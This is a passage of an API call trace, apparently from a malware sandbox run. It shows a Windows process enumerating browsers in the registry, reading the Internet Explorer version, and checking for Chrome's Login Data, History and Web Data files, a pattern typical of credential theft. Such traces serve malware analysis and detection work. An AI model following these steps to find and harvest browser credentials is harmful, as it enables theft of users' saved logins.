Flags=0x0, Size=0xc) returned 0x61f0e0 [0180.022] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CloseHandle") returned 0x7ffb2625d650 [0180.022] GetProcessHeap () returned 0x5f0000 [0180.022] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0e0 | out: hHeap=0x5f0000) returned 1 [0180.022] CloseHandle (hObject=0x1d0) returned 1 [0180.022] GetProcessHeap () returned 0x5f0000 [0180.022] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f0c0 [0180.022] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CloseHandle") returned 0x7ffb2625d650 [0180.022] GetProcessHeap () returned 0x5f0000 [0180.022] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0c0 | out: hHeap=0x5f0000) returned 1 [0180.022] CloseHandle (hObject=0x210) returned 1 [0180.022] GetProcessHeap () returned 0x5f0000 [0180.022] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x15) returned 0x615e80 [0180.022] GetProcAddress (hModule=0x7ffb26230000, lpProcName="ProcessIdToSessionId") returned 0x7ffb26253720 [0180.022] GetProcessHeap () returned 0x5f0000 [0180.022] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615e80 | out: hHeap=0x5f0000) returned 1 [0180.022] ProcessIdToSessionId (in: dwProcessId=0x640, pSessionId=0x5cfe08 | out: pSessionId=0x5cfe08) returned 1 [0180.022] GetProcessHeap () returned 0x5f0000 [0180.022] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x23) returned 0x613320 [0180.022] GetProcessHeap () returned 0x5f0000 [0180.023] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f0c0 [0180.023] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegOpenKeyA") returned 0x7ffb28a6a960 [0180.023] GetProcessHeap () returned 0x5f0000 [0180.023] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0c0 | out: hHeap=0x5f0000) returned 1 [0180.023] RegOpenKeyA (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Clients\\StartMenuInternet", phkResult=0x5cfe10 | out: phkResult=0x5cfe10*=0x210) returned 0x0 [0180.023] GetProcessHeap () returned 0x5f0000 [0180.023] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f0c0 [0180.023] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegEnumKeyA") returned 0x7ffb28a6d0d0 [0180.023] GetProcessHeap () returned 0x5f0000 [0180.023] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0c0 | out: hHeap=0x5f0000) returned 1 [0180.023] RegEnumKeyA (in: hKey=0x210, dwIndex=0x0, lpName=0x5cf9d0, cchName=0x400 | out: lpName="IEXPLORE.EXE") returned 0x0 [0180.024] lstrlenA (lpString="IEXPLORE.EXE") returned 12 [0180.024] GetProcessHeap () returned 0x5f0000 [0180.024] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f220 [0180.024] lstrcpyA (in: lpString1=0x61f220, lpString2="IEXPLORE.EXE" | out: lpString1="IEXPLORE.EXE") returned="IEXPLORE.EXE" [0180.024] lstrlenA (lpString="\\") returned 1 [0180.024] GetProcessHeap () returned 0x5f0000 [0180.024] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f0d0 [0180.024] lstrcpyA (in: lpString1=0x61f0d0, lpString2="\\" | out: lpString1="\\") returned="\\" [0180.024] GetProcessHeap () returned 0x5f0000 [0180.024] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x615c80 [0180.024] GetProcessHeap () returned 0x5f0000 [0180.024] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x23) returned 0x613440 [0180.024] GetProcessHeap () returned 0x5f0000 [0180.024] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613440, Size=0x47) returned 0x6204b0 [0180.024] GetProcessHeap () returned 0x5f0000 [0180.024] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613440 [0180.024] GetProcessHeap () returned 0x5f0000 [0180.024] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613440, Size=0x5f) returned 0x6187d0 [0180.024] GetProcessHeap () returned 0x5f0000 [0180.024] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x30) returned 0x613440 [0180.024] GetProcessHeap () returned 0x5f0000 [0180.024] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613440, Size=0x85) returned 0x61cf70 [0180.024] GetProcessHeap () returned 0x5f0000 [0180.024] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f0c0 [0180.024] GetProcessHeap () returned 0x5f0000 [0180.024] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f0e0 [0180.024] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegOpenKeyExA") returned 0x7ffb28a67200 [0180.024] GetProcessHeap () returned 0x5f0000 [0180.024] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0e0 | out: hHeap=0x5f0000) returned 1 [0180.024] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Clients\\StartMenuInternet\\IEXPLORE.EXE\\shell\\open\\command", ulOptions=0x0, samDesired=0x20019, phkResult=0x5cf7c8 | out: phkResult=0x5cf7c8*=0x1d0) returned 0x0 [0180.025] GetProcessHeap () returned 0x5f0000 [0180.025] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x11) returned 0x615ce0 [0180.025] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegQueryValueExA") returned 0x7ffb28a672d0 [0180.025] GetProcessHeap () returned 0x5f0000 [0180.025] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ce0 | out: hHeap=0x5f0000) returned 1 [0180.025] RegQueryValueExA (in: hKey=0x1d0, lpValueName=0x0, lpReserved=0x0, lpType=0x5cf7c0, lpData=0x0, lpcbData=0x5cf808*=0x0 | out: lpType=0x5cf7c0*=0x1, lpData=0x0, lpcbData=0x5cf808*=0x30) returned 0x0 [0180.026] GetProcessHeap () returned 0x5f0000 [0180.026] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f0e0 [0180.026] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0180.026] GetProcessHeap () returned 0x5f0000 [0180.026] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0e0 | out: hHeap=0x5f0000) returned 1 [0180.026] GetProcessHeap () returned 0x5f0000 [0180.026] GetProcessHeap () returned 0x5f0000 [0180.026] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f0e0 [0180.026] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0180.026] GetProcessHeap () returned 0x5f0000 [0180.026] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0e0 | out: hHeap=0x5f0000) returned 1 [0180.026] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f0c0, Size=0x30) returned 0x613440 [0180.026] GetProcessHeap () returned 0x5f0000 [0180.026] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x11) returned 0x615dc0 [0180.026] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegQueryValueExA") returned 0x7ffb28a672d0 [0180.026] GetProcessHeap () returned 0x5f0000 [0180.026] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615dc0 | out: hHeap=0x5f0000) returned 1 [0180.026] RegQueryValueExA (in: hKey=0x1d0, lpValueName=0x0, lpReserved=0x0, lpType=0x5cf7c0, lpData=0x613440, lpcbData=0x5cf808*=0x30 | out: lpType=0x5cf7c0*=0x1, lpData="C:\\Program Files\\Internet Explorer\\iexplore.exe", lpcbData=0x5cf808*=0x30) returned 0x0 [0180.026] GetProcessHeap () returned 0x5f0000 [0180.026] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f1b0 [0180.026] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegCloseKey") returned 0x7ffb28a66620 [0180.027] GetProcessHeap () returned 0x5f0000 [0180.027] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f1b0 | out: hHeap=0x5f0000) returned 1 [0180.027] RegCloseKey (hKey=0x1d0) returned 0x0 [0180.027] GetProcessHeap () returned 0x5f0000 [0180.027] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x30) returned 0x613b60 [0180.027] GetProcessHeap () returned 0x5f0000 [0180.027] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.027] GetProcessHeap () returned 0x5f0000 [0180.027] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61cf70 | out: hHeap=0x5f0000) returned 1 [0180.027] GetProcessHeap () returned 0x5f0000 [0180.027] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6187d0 | out: hHeap=0x5f0000) returned 1 [0180.027] GetProcessHeap () returned 0x5f0000 [0180.027] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6204b0 | out: hHeap=0x5f0000) returned 1 [0180.027] GetProcessHeap () returned 0x5f0000 [0180.027] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615c80 | out: hHeap=0x5f0000) returned 1 [0180.027] GetProcessHeap () returned 0x5f0000 [0180.027] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0d0 | out: hHeap=0x5f0000) returned 1 [0180.027] GetProcessHeap () returned 0x5f0000 [0180.027] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f220 | out: hHeap=0x5f0000) returned 1 [0180.027] GetProcessHeap () returned 0x5f0000 [0180.027] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2e) returned 0x613440 [0180.027] GetProcessHeap () returned 0x5f0000 [0180.027] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2e) returned 0x613950 [0180.027] GetProcessHeap () returned 0x5f0000 [0180.027] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.027] GetProcessHeap () returned 0x5f0000 [0180.027] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613950 | out: hHeap=0x5f0000) returned 1 [0180.027] GetFileVersionInfoSizeA (in: lptstrFilename=":\\Program Files\\Internet Explorer\\iexplore.ex", lpdwHandle=0x5cfe00 | out: lpdwHandle=0x5cfe00) returned 0x0 [0180.029] GetProcessHeap () returned 0x5f0000 [0180.029] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613b60 | out: hHeap=0x5f0000) returned 1 [0180.029] GetProcessHeap () returned 0x5f0000 [0180.029] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f220 [0180.029] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegEnumKeyA") returned 0x7ffb28a6d0d0 [0180.029] GetProcessHeap () returned 0x5f0000 [0180.029] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f220 | out: hHeap=0x5f0000) returned 1 [0180.029] RegEnumKeyA (in: hKey=0x210, dwIndex=0x1, lpName=0x5cf9d0, cchName=0x400 | out: lpName="IEXPLORE.EXE") returned 0x103 [0180.029] GetProcessHeap () returned 0x5f0000 [0180.029] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f100 [0180.029] GetProcessHeap () returned 0x5f0000 [0180.029] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25) returned 0x613440 [0180.029] GetProcessHeap () returned 0x5f0000 [0180.029] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f1a0 [0180.029] GetProcessHeap () returned 0x5f0000 [0180.029] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f110 [0180.029] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegOpenKeyExA") returned 0x7ffb28a67200 [0180.029] GetProcessHeap () returned 0x5f0000 [0180.029] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f110 | out: hHeap=0x5f0000) returned 1 [0180.029] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x5cf7c8 | out: phkResult=0x5cf7c8*=0x1d0) returned 0x0 [0180.029] GetProcessHeap () returned 0x5f0000 [0180.029] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x11) returned 0x615e80 [0180.030] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegQueryValueExA") returned 0x7ffb28a672d0 [0180.030] GetProcessHeap () returned 0x5f0000 [0180.030] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615e80 | out: hHeap=0x5f0000) returned 1 [0180.030] RegQueryValueExA (in: hKey=0x1d0, lpValueName="svcVersion", lpReserved=0x0, lpType=0x5cf7c0, lpData=0x0, lpcbData=0x5cf808*=0x0 | out: lpType=0x5cf7c0*=0x1, lpData=0x0, lpcbData=0x5cf808*=0xd) returned 0x0 [0180.030] GetProcessHeap () returned 0x5f0000 [0180.030] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f0c0 [0180.030] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0180.030] GetProcessHeap () returned 0x5f0000 [0180.030] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0c0 | out: hHeap=0x5f0000) returned 1 [0180.030] GetProcessHeap () returned 0x5f0000 [0180.030] GetProcessHeap () returned 0x5f0000 [0180.030] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f0c0 [0180.030] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0180.030] GetProcessHeap () returned 0x5f0000 [0180.030] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0c0 | out: hHeap=0x5f0000) returned 1 [0180.030] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f1a0, Size=0xd) returned 0x61f0c0 [0180.030] GetProcessHeap () returned 0x5f0000 [0180.030] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x11) returned 0x615c80 [0180.030] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegQueryValueExA") returned 0x7ffb28a672d0 [0180.030] GetProcessHeap () returned 0x5f0000 [0180.030] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615c80 | out: hHeap=0x5f0000) returned 1 [0180.030] RegQueryValueExA (in: hKey=0x1d0, lpValueName="svcVersion", lpReserved=0x0, lpType=0x5cf7c0, lpData=0x61f0c0, lpcbData=0x5cf808*=0xd | out: lpType=0x5cf7c0*=0x1, lpData="11.0.10586.0", lpcbData=0x5cf808*=0xd) returned 0x0 [0180.031] GetProcessHeap () returned 0x5f0000 [0180.031] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f1a0 [0180.031] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegCloseKey") returned 0x7ffb28a66620 [0180.031] GetProcessHeap () returned 0x5f0000 [0180.031] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f1a0 | out: hHeap=0x5f0000) returned 1 [0180.031] RegCloseKey (hKey=0x1d0) returned 0x0 [0180.031] GetProcessHeap () returned 0x5f0000 [0180.031] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f120 [0180.031] GetProcessHeap () returned 0x5f0000 [0180.031] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0c0 | out: hHeap=0x5f0000) returned 1 [0180.031] GetProcessHeap () returned 0x5f0000 [0180.031] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.031] GetProcessHeap () returned 0x5f0000 [0180.031] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f100 | out: hHeap=0x5f0000) returned 1 [0180.031] GetProcessHeap () returned 0x5f0000 [0180.031] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f120 | out: hHeap=0x5f0000) returned 1 [0180.031] GetProcessHeap () returned 0x5f0000 [0180.031] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0180.034] GetProcessHeap () returned 0x5f0000 [0180.034] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f140 [0180.034] GetProcessHeap () returned 0x5f0000 [0180.034] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615f40 [0180.034] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.035] GetProcessHeap () returned 0x5f0000 [0180.035] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f40 | out: hHeap=0x5f0000) returned 1 [0180.037] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.042] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.042] GetProcessHeap () returned 0x5f0000 [0180.042] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.042] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.042] GetProcessHeap () returned 0x5f0000 [0180.042] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x22) returned 0x613440 [0180.042] GetProcessHeap () returned 0x5f0000 [0180.042] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613bc0 [0180.042] GetProcessHeap () returned 0x5f0000 [0180.042] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613bc0, Size=0x89) returned 0x61c3a0 [0180.042] GetProcessHeap () returned 0x5f0000 [0180.042] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x45) returned 0x6200f0 [0180.042] GetProcessHeap () returned 0x5f0000 [0180.042] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6200f0, Size=0x9d) returned 0x611f60 [0180.042] GetProcessHeap () returned 0x5f0000 [0180.042] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x4f) returned 0x620730 [0180.042] GetProcessHeap () returned 0x5f0000 [0180.042] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.042] GetProcessHeap () returned 0x5f0000 [0180.042] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c3a0 | out: hHeap=0x5f0000) returned 1 [0180.045] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.045] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned 0 [0180.045] GetProcessHeap () returned 0x5f0000 [0180.045] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.046] GetProcessHeap () returned 0x5f0000 [0180.046] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x620730 | out: hHeap=0x5f0000) returned 1 [0180.046] GetProcessHeap () returned 0x5f0000 [0180.046] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f0c0 [0180.046] GetProcessHeap () returned 0x5f0000 [0180.046] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615e80 [0180.046] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.046] GetProcessHeap () returned 0x5f0000 [0180.046] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615e80 | out: hHeap=0x5f0000) returned 1 [0180.046] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.046] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.046] GetProcessHeap () returned 0x5f0000 [0180.046] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.046] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.046] GetProcessHeap () returned 0x5f0000 [0180.046] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x22) returned 0x613440 [0180.046] GetProcessHeap () returned 0x5f0000 [0180.046] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613860 [0180.046] GetProcessHeap () returned 0x5f0000 [0180.046] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613860, Size=0x89) returned 0x61c820 [0180.046] GetProcessHeap () returned 0x5f0000 [0180.046] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x45) returned 0x6209b0 [0180.046] GetProcessHeap () returned 0x5f0000 [0180.046] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6209b0, Size=0x97) returned 0x611f60 [0180.046] GetProcessHeap () returned 0x5f0000 [0180.046] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x4c) returned 0x620140 [0180.046] GetProcessHeap () returned 0x5f0000 [0180.046] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.046] GetProcessHeap () returned 0x5f0000 [0180.046] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c820 | out: hHeap=0x5f0000) returned 1 [0180.046] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.046] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History") returned 0 [0180.047] GetProcessHeap () returned 0x5f0000 [0180.047] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.047] GetProcessHeap () returned 0x5f0000 [0180.047] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x620140 | out: hHeap=0x5f0000) returned 1 [0180.047] GetProcessHeap () returned 0x5f0000 [0180.047] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f100 [0180.047] GetProcessHeap () returned 0x5f0000 [0180.047] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615ca0 [0180.047] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.047] GetProcessHeap () returned 0x5f0000 [0180.047] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ca0 | out: hHeap=0x5f0000) returned 1 [0180.047] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.047] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.047] GetProcessHeap () returned 0x5f0000 [0180.047] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.047] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.047] GetProcessHeap () returned 0x5f0000 [0180.047] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x22) returned 0x613440 [0180.047] GetProcessHeap () returned 0x5f0000 [0180.047] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613950 [0180.047] GetProcessHeap () returned 0x5f0000 [0180.047] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613950, Size=0x89) returned 0x61c0d0 [0180.047] GetProcessHeap () returned 0x5f0000 [0180.047] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x45) returned 0x620730 [0180.047] GetProcessHeap () returned 0x5f0000 [0180.047] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620730, Size=0x99) returned 0x611f60 [0180.047] GetProcessHeap () returned 0x5f0000 [0180.047] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x4d) returned 0x6205f0 [0180.047] GetProcessHeap () returned 0x5f0000 [0180.047] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.047] GetProcessHeap () returned 0x5f0000 [0180.047] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c0d0 | out: hHeap=0x5f0000) returned 1 [0180.047] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.048] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data") returned 0 [0180.048] GetProcessHeap () returned 0x5f0000 [0180.048] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.048] GetProcessHeap () returned 0x5f0000 [0180.048] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6205f0 | out: hHeap=0x5f0000) returned 1 [0180.048] GetProcessHeap () returned 0x5f0000 [0180.048] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f1a0 [0180.048] GetProcessHeap () returned 0x5f0000 [0180.048] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615e80 [0180.048] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.048] GetProcessHeap () returned 0x5f0000 [0180.048] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615e80 | out: hHeap=0x5f0000) returned 1 [0180.048] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.048] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.048] GetProcessHeap () returned 0x5f0000 [0180.048] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.048] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.048] GetProcessHeap () returned 0x5f0000 [0180.048] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x22) returned 0x613440 [0180.048] GetProcessHeap () returned 0x5f0000 [0180.048] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613800 [0180.048] GetProcessHeap () returned 0x5f0000 [0180.048] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613800, Size=0x89) returned 0x61c550 [0180.048] GetProcessHeap () returned 0x5f0000 [0180.048] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x45) returned 0x620320 [0180.048] GetProcessHeap () returned 0x5f0000 [0180.048] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620320, Size=0xa5) returned 0x6247e0 [0180.048] 